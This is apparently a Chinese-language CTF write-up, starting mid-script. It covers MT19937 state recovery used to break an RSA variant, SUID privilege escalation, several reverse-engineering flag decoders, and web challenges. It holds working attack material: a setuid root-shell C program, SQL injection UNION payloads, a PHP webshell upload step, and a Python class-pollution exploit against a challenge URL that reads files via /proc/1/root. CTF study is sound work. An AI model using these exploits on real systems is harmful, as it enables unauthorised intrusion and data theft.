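    return x & 0xffffffff


def _ulxa(y, s, m):
    """Invert ``x ^= (x << s) & m`` on a 32-bit word.

    Each fixed-point round recovers another s low bits; five rounds cover
    all 32 bits for the shifts used here (15 and 7).
    """
    x = 0
    for _ in range(5):
        x = y ^ ((x << s) & m)
    return x & 0xffffffff


def untemper(y):
    """Map one 32-bit generator output back to its internal state word.

    Undoes the four tempering steps of temper() in reverse order. That this
    is possible at all is why the generator's outputs must never be treated
    as secret or unpredictable.
    """
    y = _urx(y, 18)
    y = _ulxa(y, 15, 0xEFC60000)
    y = _ulxa(y, 7, 0x9D2C5680)
    y = _urx(y, 11)
    return y & 0xffffffff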
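def temper(x):
    """Apply the MT19937 output tempering to one 32-bit state word."""
    x ^= (x >> 11)
    x ^= (x << 7) & 0x9D2C5680
    x ^= (x << 15) & 0xEFC60000
    x ^= (x >> 18)
    return x & 0xffffffff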
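def twist(state):
    """Advance a 624-word MT19937 state to the next block, in place.

    Each word is rebuilt from the top bit of itself, the low 31 bits of its
    successor and the word M positions ahead (indices wrap modulo N).
    Returns the same list object that was passed in.
    """
    for i in range(N):
        x = (state[i] & UPPER_MASK) | (state[(i+1)%N] & LOWER_MASK)
        xA = x >> 1
        if x & 1:
            xA ^= MATRIX_A
        state[i] = state[(i + M) % N] ^ xA
    return state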
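def predict_next_32bit(outputs_624):
    """Predict the next 32-bit MT19937 output from 624 consecutive outputs.

    The outputs are untempered back into the state, a copy of that state is
    twisted once, and the first new word is tempered again.  This works
    because the generator's whole state is exposed by its own output, which
    is why values that must stay unpredictable (keys, exponents, tokens)
    should come from ``secrets`` / ``os.urandom`` instead.

    Raises:
        ValueError: if the number of outputs does not match the state size.
    """
    if len(outputs_624) != N:
        raise ValueError("need exactly %d consecutive 32-bit outputs" % N)
    state = [untemper(y) for y in outputs_624]
    state2 = twist(state[:])  # twist a copy; the recovered state is kept intact
    return temper(state2[0])


LIST1 = [1728665541, 3263255435, 2691063119, 513420434, 1978667458, 2092691241, 3072561387, 378231450, 3028786976, 840997868, 3471062203, 3920316636, 3916637804, 2376627024, 3173388560, 3539723936, 3614347224, 1379925726, 627801586, 2033110031, 3011670978, 2445060030, 3597825709, 1550315482, 3554680797, 536809681, 2468123914, 2237079688, 2296929082, 509016983, 1311981805, 587441307, 1250231566, 1315700906, 776365185, 2859464782, 3355190319, 1918102563, 211231701, 845506441, 3178972471, 3192228027, 1529640612, 1191656594, 484407364, 2429115020, 1919153985, 4078408440, 202834614, 3117949094, 3476209197, 4079805955, 111463567, 3658322943, 1016273317, 807556240, 3367455806, 2847052298, 2082435398, 1180401345, 3299362819, 4184474116, 2494750167, 4096990231, 1612750035, 770130274, 1733434788, 3092462951, 172910303, 2670474919, 362297276, 2782760415, 2884584980, 2326865163, 720680806, 1281073207, 950149740, 2778388627, 3101343550, 2770433242, 2788026555, 1262935285, 3581320389, 4194538979, 696994625, 821111473, 2806414521, 777650820, 3663930324, 4178227152, 606200040, 2069454582, 2173681644, 2922086151, 2020623409, 3758719473, 1312449069, 2927391874, 4270320113, 3753066345, 1995980698, 4258470255, 1327644070, 3351177965, 298217788, 2620469257, 2989578615, 4055438139, 3942865412, 1622171985, 4273198698, 1243493635, 1396590445, 2402566178, 4029896237, 1025694233, 2314450406, 4170179809, 4024445981, 1994273208, 1861210759, 1803769206, 3689618816, 2927243579, 1922806785, 2486390395, 1862533438, 1121029203, 2031745224, 3841331572, 3769538458, 842401540, 2163702504, 831385340, 376394126, 3974915965, 4034996030, 1854785567, 2555092021, 3046897262, 1094027606, 907771043, 384404822, 3501497369, 216697168, 226807575, 2747644288, 1972752441, 3105815096, 828173042, 3678659380, 764441556, 1130297460, 1402863762, 3970725436, 3086776368, 344855794, 2088029785, 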
503832722, 1968203466, 279790788, 3883395066, 4037131559, 1964635994, 1743508595, 3532171326, 1818297125, 2848875183, 1136249744, 4272443113, 1788562924, 3711074145, 418022453, 4283864580, 1386827219, 2059781647, 449497651, 469589888, 3588436437, 351986216, 3443966898, 2319253729, 1266070779, 1630403341, 1846437281, 3603091148, 447407528, 1442665148, 928268668, 2054879461, 774139131, 2430644896, 3555838468, 2030660868, 3319238578, 1015731571, 3478144019, 2453174776, 1941944791, 2053565326, 4110536281, 2526460393, 2824479032, 3301735760, 780255490, 1603208589, 1692469907, 3130130497, 3584634807, 3928107012, 509990258, 1869589899, 1905903514, 2952291895, 1729434633, 2044093816, 970234210, 1567208463, 2796641501, 1745350460, 3822138868, 2103785872, 391350339, 4191592334, 137687673, 4006137512, 1593615631, 1861899739, 3651189911, 520633354, 1966539346, 169641067, 1406362177, 737946704, 784276247, 2058995198, 3549499398, 1558398384, 3675852813, 1429069728, 2298431975, 2898233687, 286239555, 392193984, 3086032521, 3126507866, 34675686, 2287440422, 2548373557, 836659862, 99648826, 1083241258, 3636664381, 3251127672, 3516486155, 3869736806, 3646281836, 1700118982, 2156956, 1800018184, 777416396, 322014799, 3243611333, 1128026911, 4092136383, 2745524281, 751830889, 4158398986, 2017168515, 4209181862, 1454303529, 4210187982, 2987136052, 118405085, 2154307567, 2706958148, 783722604, 3630718307, 2946126077, 3769533841, 1952446395, 2864470266, 2438635144, 109801110, 2106815318, 1964646247, 2230611498, 3926379899, 2415862583, 2403244187, 1558995124, 755524922, 3392617372, 3025516874, 4190475123, 2949921629, 501571073, 4156590328, 4269504697, 2949638988, 1468559288, 3213839184, 2489556309, 3740310282, 2197691296, 2398027688, 3828617697, 1569783402, 2795666101, 176638489, 2911249476, 4241926468]
n1 = 138851415190713465480971174257448869324235475491224608863667367765557787130928841140544464901159451427142751973587286540048280289357977393428301017662916668537581389547284678037051116847831257571725930334961572331109949981542324563168168819931774176415705884732805196594752559820155791993081799451192512108559
LIST2 = [942815517, 2520455710, 1891728341, 2453497085, 3941880462, 2392891255, 2747143494, 4243618507, 1517358347, 450211540, 2842693883, 1221103042, 1422891239, 4030144964, 2685521942, 1947290728, 3302832218, 1782499203, 3868364088, 308582506, 4251094005, 4980868, 2451326086, 3651628499, 2281074832, 480798516, 758959082, 3615264118, 1219594762, 1098658489, 2470901076, 1893356372, 3318772649, 1863044573, 3548017752, 3763808736, 1654584736, 3003555639, 1256437939, 3270885177, 258743642, 1299719645, 2208182535, 373707415, 1911873380, 92306350, 1545073247, 3827312104, 3255398601, 3192552708, 3206214673, 420879235, 1364502459, 3758282150, 2525185637, 1668948490, 1540972099, 4226808177, 2383393173, 3749471576, 1454575032, 3539841865, 690099204, 3429693556, 3143045768, 1019783847, 4254140560, 3362875271, 4286952044, 3651977835, 3979297548, 3354687702, 732498631, 830001339, 1600709940, 256242259, 3433896402, 717208932, 1143942721, 1387817800, 4149665963, 4136218742, 1148960729, 3448152230, 88647458, 1774354757, 3157382396, 2749420283, 3384884111, 4052749938, 3562466643, 388123649, 1019572873, 9288731, 2722126277, 2203755362, 2808094116, 318555465, 4238001430, 1279580330, 2688604848, 1360319839, 2479873580, 1061154987, 2958583972, 479553026, 1527664208, 1632893535, 3787166229, 989207338, 1663447933, 3712938090, 4198966560, 2566654848, 3696114905, 3012771350, 3607688877, 913491574, 3931397722, 3009342175, 2443448349, 1062996946, 2981037281, 26940862, 949228546, 4200949390, 4183590581, 1149500333, 2868274151, 1076013183, 2931224950, 1231187554, 1432454474, 462283109, 2459428825, 2313869884, 3779120205, 671163379, 283074107, 4292451272, 2073686644, 2106538278, 795977087, 1521261558, 2211934761, 3442006668, 810921154, 657699377, 2190946289, 3774455606, 95125385, 2480329023, 3476089304, 1238475919, 1076726394, 2120212816, 912904401, 3115487553, 4166801889, 2671842223, 3233061625, 2792720396, 164231023, 2899715615, 1080603752, 1871958768, 3205958631, 1429172605, 102859110, 
1233358091, 4121045015, 3707468958, 2054107845, 3086180315, 3618494768, 151289595, 2395511379, 2202211183, 3317167416, 924499924, 1123843927, 1845597735, 2551305188, 281765988, 2688253086, 1560780497, 2061169891, 573571184, 2525386268, 1825854571, 2899785981, 3266712321, 3610412586, 411137454, 3935324159, 2494782798, 3373400635, 909758036, 730762387, 821217945, 1637755246, 914390627, 364271532, 3570237156, 739531656, 3535813993, 3136577043, 269001524, 330161113, 1582587768, 4276579985, 650173619, 2350573855, 1233199180, 824190362, 2132064523, 1630599868, 3890164143, 3281849000, 443369842, 556256551, 3665988107, 168059217, 2459533678, 2959581748, 1266795043, 2541445057, 3690162432, 4033239960, 2747349823, 2527544983, 3483114688, 1912665005, 2589639629, 967006093, 3043481320, 1577789923, 888032317, 3135015646, 1807362947, 3974720459, 1028251582, 1395973950, 141248013, 3415448254, 2585771855, 1652904856, 2483847688, 1241390535, 2966558718, 80133169, 544591052, 117065220, 1259833545, 4287364552, 3172964645, 1378147180, 1961149024, 2557044426, 3079500155, 1278712539, 2437075468, 4079403208, 1424357113, 1460980393, 1869711134, 739995379, 236457792, 56725573, 1192143182, 3480051881, 1940191085, 2145576244, 277256288, 1350391298, 927908951, 234611527, 1270659504, 2800736156, 2377033778, 379042674, 268642839, 254414386, 3717739293, 3742427571, 2062173352, 1468838866, 3248800238, 3810334297, 1774562996, 3243508531, 768385892, 3663776790, 3561471474, 2072506584, 4072612194, 4145385651, 1568151342, 413061947, 2606711318, 787242867, 358259431, 3250866366, 496471679, 3974003161, 3962245443, 3448346690, 3918858426, 1545049592, 4098252582, 4272944055, 2709981394]
n2 = 114667370859267713459979739172691665204879151133165169917752071845350748196947769536460950730177555853607685665148468694999487984430241339705779225600425842398781387739352517522092529671186262329583850232443458354943390042125768975735770226662059908491110663467968924345474794260851510527271024718213859872091
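c = 254437839234710932548963084800696912447199841209292016504026652383142017227876963989808065988983617626350151358444895183944611290313513729505521630711812174923796964838915751672967332321515720258149777206328112312514688748335753179198631177743199829645308091442800427146012476434191025450662950787631144984158609948536064605299987908223963902731920237033619141863042816600729594847568654431928343565350409273886054122366132475796004834811862120850908513978375240

# Hard-coded prime factorisation {prime: exponent} of the exponent e.
E_FACT = {2: 2, 109: 1, 257: 1, 11579: 1}


def one_e_th_root_mod_p(p, e, c):
    """Return candidate e-th roots of ``c`` modulo ``p`` as a list.

    The factorisation of ``e`` is taken from the module-level ``E_FACT``;
    ``e`` itself is only used to confirm that the table matches.  The
    candidates are not checked against ``z ** e == c``: the square-root
    helper does not reject non-residues, so the list can contain values
    that are not roots and the caller has to filter them.

    Raises:
        ValueError: if ``E_FACT`` is not the factorisation of ``e``.
    """
    table_product = 1
    for prime, exp in E_FACT.items():
        table_product *= prime ** exp
    if table_product != e:
        raise ValueError("E_FACT does not factor the supplied exponent")

    k = p - 1

    # Prime powers of e that are coprime to p - 1 can be inverted outright.
    e_c = 1
    for prime, exp in E_FACT.items():
        if k % prime != 0:
            e_c *= pow(prime, exp)
    y = pow(c % p, pow(e_c, -1, k), p)

    # One round of square roots per factor of 2 in e.
    cand = {y}
    two_exp = E_FACT.get(2, 0)
    for _ in range(two_exp):
        new = set()
        for z in cand:
            r1, r2 = tonelli(z, p)
            new.add(r1)
            new.add(r2)
        cand = new

    k_cur = k
    for _ in range(two_exp):
        k_cur //= 2

    # Odd primes of e that also divide p - 1: strip them from k_cur one at a
    # time and raise every candidate to the inverse of that prime.
    for prime, exp in E_FACT.items():
        if prime == 2 or k % prime != 0 or not exp:
            continue
        for _ in range(exp):
            inv = pow(prime, -1, k_cur // prime)
            cand = {pow(z, inv, p) for z in cand}
            k_cur //= prime
    return list(cand)


outputs_624 = LIST1 + LIST2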
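# The exponent was drawn from the same MT19937 stream as the 624 leaked
# words, so it is the next predicted output.
e_pred = predict_next_32bit(outputs_624)
print("[+] e =", e_pred)

# n1 and n2 share a prime factor, so a single gcd factors both moduli.
q = gcd(n1, n2)
if q == 1:
    raise ValueError("n1 and n2 share no common factor")
p = n1 // q
r = n2 // q
# Named ``modulus`` rather than ``N`` so the MT19937 state size that
# twist() reads from the module-level ``N`` is not overwritten.
modulus = p * q * r

roots_p = one_e_th_root_mod_p(p, e_pred, c)
roots_q = one_e_th_root_mod_p(q, e_pred, c)
roots_r = one_e_th_root_mod_p(r, e_pred, c)


def all_crt_roots():
    """Yield the CRT combination of every (root mod p, mod q, mod r) triple."""
    for rp in roots_p:
        for rq in roots_q:
            for rr in roots_r:
                yield crt_all([rp, rq, rr], [p, q, r])[0]


base = list(all_crt_roots())

# e is not coprime to the group orders, so each prime contributes
# gcd(e, prime - 1) roots; they differ by powers of an element of that order.
d_p, d_q, d_r = gcd(e_pred, p - 1), gcd(e_pred, q - 1), gcd(e_pred, r - 1)
g_p = generator_of_exact_order(p, d_p)
g_q = generator_of_exact_order(q, d_q)
g_r = generator_of_exact_order(r, d_r)

seen = set()


def _find_flag():
    """Walk every root candidate and return the first one with a flag prefix."""
    prefixes = (b"flag{", b"FLAG{", b"ctf{")
    for m0 in base:
        for i in range(d_p):
            k0 = pow(g_p, i, p)
            for j in range(d_q):
                k1 = pow(g_q, j, q)
                for k2 in range(d_r):
                    k2v = pow(g_r, k2, r)
                    K, _ = crt_all([k0, k1, k2v], [p, q, r])
                    m = (m0 * K) % modulus
                    if m in seen:
                        continue
                    seen.add(m)
                    b = long_to_bytes(m)
                    if b.startswith(prefixes):
                        return b
    return None


ans = _find_flag()
print("[+] flag =", ans)
"""
[+] e = 1297450108
[+] flag = b'flag{wwooooow_u_no_the_randdoooooo0m!!!}'
"""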
misc
《关于我穿越到CTF的异世界这档事:破》
题目描述:
metavi穿过第一层的光之门,眼前是一片由无数黑色石柱组成的荒原。石柱表面闪烁着绿色的字符流,仿佛是某种古老的系统在运转。
石柱的底层写着:用户:ctf,密码:CtfP@ssw0rd!2025
看完这一行之后,脚下的大地裂开,露出一座巨大的“终端祭坛”。祭坛上浮现出一行行命令,却被层层权限屏障所阻挡。 要想突破这一关,metavi必须找到隐藏在系统中的漏洞,逐步提升权限,直至掌控整个祭坛。
【第二层·linux提权:请ssh连接提权,找到祭坛深处的flag。】
ssh远程连接,找到提示是linux的SUID提权
查找所有SUID权限的文件:
find / -type f -perm -4000 2>/dev/null
结果中的第一个文件像是一个自定义的程序,先对其进行检查
发现环境中可以使用 GCC,于是编译下面这段代码:
#include <unistd.h>
/*
 * Sets the process UID and GID to 0, then replaces the process image with
 * /bin/sh started with -p.  The return values of setuid()/setgid() are not
 * checked, so if the process lacks the privilege the calls fail silently
 * and the shell starts with the caller's own IDs.
 * NOTE(review): the write-up does not show how this binary comes to run with
 * root's effective UID; that depends on the SUID file found in the listing
 * above.  -p is presumably there so the shell keeps its effective IDs;
 * confirm for the shell in use.
 * Defensive reading: the same `find / -type f -perm -4000` listing is the
 * audit to run for unexpected SUID-root files on a multi-user host.
 */
int main() {setuid(0); setgid(0);execl("/bin/sh","sh","-p",NULL);return 0;
}
成功提权了,查找flag存放位置
find / -name 'flag*' 2>/dev/null
reverse
Pyc
die查壳
py打包程序,在线网站解包,https://pyinstxtractor-web.netlify.app/
在线网站反编译,https://www.lddgo.net/string/pyc-compile-decompile
# uncompyle6 version 3.9.2
# Python bytecode version base 3.8.0 (3413)
# Decompiled from: Python 3.6.12 (default, Feb 9 2021, 09:19:15)
# [GCC 8.3.0]
# Embedded file name: pyc.py
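# Flag checker recovered from the packed executable.  Each character is
# mapped by class (lowercase / uppercase / other) to a number, and the
# comma-joined hex of the result is compared with a fixed string.
print("Ciallo~")
print("Plz input your flag~")
flag = input()
flag_list = list(flag)
for i, a in enumerate(flag_list):
    if "a" <= a <= "z":
        a = (ord(a) - 12) * 2 + 6
    elif "A" <= a <= "Z":
        a = (ord(a) + 6) * 3 + 9
    else:
        a = ord(a) + 11
    flag_list[i] = chr(a)

# The decompiler emitted the tail as a ``for ... else`` clause; the loop has
# no ``break``, so running it unconditionally after the loop is equivalent.
flag = "".join(flag_list)
hex_flag = ",".join([hex(ord(c)) for c in flag])
data = "0xba,0xc6,0xb0,0xbc,0x86,0x10b,0x126,0xe4,0x6a,0xc0,0x40,0x6a,0xda,0x3f,0xd2,0xe0,0x6a,0xb8,0x3f,0xd4,0xe0,0x89,0x88"
if data != hex_flag:
    print("wrong~")
else:
    print("great~")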
exp:
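data = "0xba,0xc6,0xb0,0xbc,0x86,0x10b,0x126,0xe4,0x6a,0xc0,0x40,0x6a,0xda,0x3f,0xd2,0xe0,0x6a,0xb8,0x3f,0xd4,0xe0,0x89,0x88"
hex_list = data.split(",")
enc_nums = [int(x, 16) for x in hex_list]


def _decode_value(e):
    """Invert the checker's per-character mapping for one encoded number.

    The three encodings are lowercase -> 2*o - 18, uppercase -> 3*o + 27 and
    anything else -> o + 11 (``o`` being the code point).  Their ranges
    overlap, so the mapping is tried in that order and the first candidate
    that lands back in its own character class wins.
    """
    if (e + 18) % 2 == 0:
        p = (e + 18) // 2
        if ord('a') <= p <= ord('z'):
            return chr(p)
    if (e - 27) % 3 == 0:
        p = (e - 27) // 3
        if ord('A') <= p <= ord('Z'):
            return chr(p)
    return chr(e - 11)


flag = [_decode_value(e) for e in enc_nums]
print( "".join(flag))
"""
flag{PYC_i5_v4ry_e4sy~}
"""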
UPX
题目描述:
这应该是道手脱题。。。
die查壳
UPX脱壳,发现报错
010查看,是魔改壳
能发现部分16进制值为(2E 2E 2E 2E),进行修改
成功脱壳
ida分析程序,查看main函数
算法逻辑很直接了
exp:
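def decrypt(enc: str) -> str:
    """Undo the position-dependent letter shift used by the unpacked binary.

    For the character at index ``i``: uppercase letters are rotated back by
    ``i`` and lowercase letters forward by ``i`` (both modulo 26); all other
    characters pass through unchanged.  Decoding stops after the first ``}``.
    """
    res = []
    for i, ch in enumerate(enc):
        if 'A' <= ch <= 'Z':
            p = chr((ord(ch) - 65 - i) % 26 + 65)
        elif 'a' <= ch <= 'z':
            p = chr((ord(ch) - 97 + i) % 26 + 97)
        else:
            p = ch
        res.append(p)
        if ch == '}':
            # The closing brace ends the flag; anything after it is ignored.
            break
    return ''.join(res)


if __name__ == "__main__":
    enc = "fkyd{YNek_SD_AB@ars_OKT}"
    flag = decrypt(enc)
    print(flag)
"""
flag{THls_IS_NN@qik_UPX}
"""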
base
题目描述:
base家族小合集
die查壳,没壳
ida进行分析
注释中有一串base58编码的字符串:
2wvnsjrESxyfytuhEwqChbLLZRtA4VLhf5HgrKNRR3jYZGgyd1XHEhypTQ8b546txjJx7wHgJaJw2mBxbDtS8dCS
解密后:
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/
这像是base64自定义换表
密文就应该是:
zMXHz3TuBdrPC18XB0bZzx0=
exp:
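import base64

# Ciphertext taken from the binary.
str1 = "zMXHz3TuBdrPC18XB0bZzx0="
# Custom alphabet recovered from the Base58 string (lowercase before uppercase).
string1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/"
# Standard Base64 alphabet.
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Translate from the custom alphabet to the standard one, then decode.
to_standard = str.maketrans(string1, string2)
print (base64.b64decode(str1.translate(to_standard)))
"""
b'flag{Tl4is_1o@se}'
"""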
rc4
题目描述:
你知道吗,rc4有几种解法
die查壳,没壳
ida进行分析,找main函数
发现key:ohhhRC4,题目是rc4,那这应该就是rc4的密钥咯
还有加密密文
分析rc4_init\rc4_crypt,发现这不是标准的rc4加密
多了一步与字节序号 k 的异或
exp:
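import struct


def rc4_init(key: bytes):
    """Run the RC4 key schedule and return the 256-entry permutation.

    Raises:
        ValueError: if ``key`` is empty (the key is indexed modulo its length).
    """
    if not key:
        raise ValueError("key must not be empty")
    S = list(range(256))
    k = [key[i % len(key)] for i in range(256)]
    j = 0
    for i in range(256):
        j = (k[i] + S[i] + j) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_crypt(S_init, data: bytes) -> bytes:
    """Encrypt or decrypt ``data`` with the challenge's modified RC4.

    Differs from standard RC4 in that every keystream byte is additionally
    XORed with the byte's index.  ``S_init`` is copied, so the same schedule
    can be reused and applying the function twice restores the input.
    """
    S = S_init[:]
    i = 0
    j = 0
    out = bytearray()
    for idx, b in enumerate(data):
        i = (i + 1) & 0xFF
        j = (S[i] + j) & 0xFF
        S[i], S[j] = S[j], S[i]
        # The index is reduced to one byte so inputs longer than 256 bytes do
        # not overflow the bytearray; identical to the unmasked form for
        # idx < 256.  NOTE(review): presumably matches the binary's byte
        # arithmetic - confirm against the disassembly.
        ks = (idx & 0xFF) ^ S[(S[i] + S[j]) & 0xFF]
        out.append(b ^ ks)
    return bytes(out)


buf = bytearray(27)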
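# Rebuild the 27-byte ciphertext from the little-endian constants.  The
# final 32-bit store starts at offset 23, so it overwrites the last byte of
# the third 64-bit store.
buf[0:8] = struct.pack('<Q', 0xD6DB345DC17A5FF7)
buf[8:16] = struct.pack('<Q', 0x68DAE1DE2D75D82F)
buf[16:24] = struct.pack('<Q', 0xF907EACE4A9B57E0)
buf[23:27] = struct.pack('<I', 1585012473)

cipher = bytes(buf)
key = b"ohhhRC4"

S = rc4_init(key)
plain = rc4_crypt(S, cipher)

print( plain.decode())
"""
flag{S0NNE_Rc4_l$_c13@nged}
"""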
web
Only Picture Up
题目描述:
咦?上传一个图片就能得到flag?
进入靶场是一个文件上传的页面
看页面显示只能上传 .jpg、.jpeg、.png 或 .gif 结尾的文件
那就先传一个png图片,抓包传马
上传成功了,改后缀为php
上传失败了,不是前端校验,那可能是Content-Type校验了
重新上传一个php文件,将后缀名改为jpg
找到图片路径
上传成功,蚁剑连接
根目录找到flag文件
留言板
题目描述:
jinjia2牌留言板,来说点什么吧~
从题目描述来看,考点应该是 Jinja2 的 SSTI(服务端模板注入)
进入页面
输入{{7*7}},已经很明显了,ssti
post传参,参数是message,fenjing一把梭了
登录和查询
题目描述:
这么简单的登录和查询界面,应该是漏洞百出的吧~提示:本题只需要少于100次的爆破,快速大量爆破可能导致意外被平台拦截流量(不是题目问题)。
web-week2-ezsql明显是考sql注入
进入靶场,是一个登录页面
源码中发现账号admin和一个密码本
下载密码本进行爆破
找到密码:admin123
登录账号
既然是sql注入,那可以试试有没有get传参参数,发现id=2时,页面回显改变
先确定回显位
-1' UNION SELECT 1,2,3#
回显位为2
查数据库名
-1'UNION SELECT 1,database(),3#
数据库名是:ctf
查表名
-1 union select 1,group_concat(table_name), 3, from information_schema.tables where table_schema="ctf"
回显说:未找到记录!真正的 flag 可能在名为 flags 的表中吗(暂时确定表是flags)
查列名
-1 UNION SELECT 1, group_concat(column_name), 3 FROM information_schema.columns WHERE table_schema="ctf" AND table_name="flags"#
还是同样的回显
那就直接查flags表中的flag
-1' UNION SELECT 1, group_concat(flag), 3 FROM ctf.flags#
这是什么函数
题目描述:
没见过?搜一下!在/flag
进入页面
Python/Flask 读取文件:思路类似原型链污染(在 Python 中一般称为类污染,class pollution)
exp:
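import requests

base_url = "http://challenge.ilovectf.cn:30204/"

# NOTE(review): the server code is not shown in this write-up.  Presumably
# it merges request JSON recursively into an object's attributes, which lets
# double-underscore keys reach module globals.  The defensive fix is to merge
# only into an allow-listed schema (rejecting keys that start with "__") and
# never to let request data influence ``static_folder``.
json_data = {
    "__class__": {
        "__init__": {
            "__globals__": {
                "app": {"static_folder": "/proc/1/root"}
            }
        }
    }
}

requests.post(base_url, json=json_data)

req = requests.get(base_url + "static/flag")
print(req.text)
"""
flag{45969db3-2583-46cb-866e-04b8e09c6d46}
"""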
参考:
https://www.cnblogs.com/yatq/p/19146883
https://normalsubgroup.cauchy.top/blog/game0x2025w1/